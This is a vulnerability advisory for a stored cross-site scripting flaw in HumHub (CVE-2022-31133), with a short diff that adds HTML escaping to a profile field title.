Headline
CVE-2022-31133: Fix format of displaying user profile title field on "People" page (#… · humhub/humhub@07d9f8f
HumHub is an Open Source Enterprise Social Network. Affected versions of HumHub are vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. For exploitation, the attacker would need a permission to administer the Spaces feature. The names of individual “spaces” are not properly escaped and so an attacker with sufficient privilege could insert malicious javascript into a space name and exploit system users who visit that space. It is recommended that the HumHub is upgraded to 1.11.4, 1.10.5. There are no known workarounds for this issue.
@@ -102,7 +102,7 @@ private function initProfileFieldFilter(ProfileField $profileField, $sortOrder = $fieldType = isset($definition[$profileField->internal_name][‘type’]) ? $definition[$profileField->internal_name][‘type’] : null;
$filterData = [ ‘title’ => Yii::t($profileField->getTranslationCategory(), $profileField->title), ‘title’ => Html::encode(Yii::t($profileField->getTranslationCategory(), $profileField->title)), ‘type’ => $fieldType, ‘sortOrder’ => $sortOrder, ];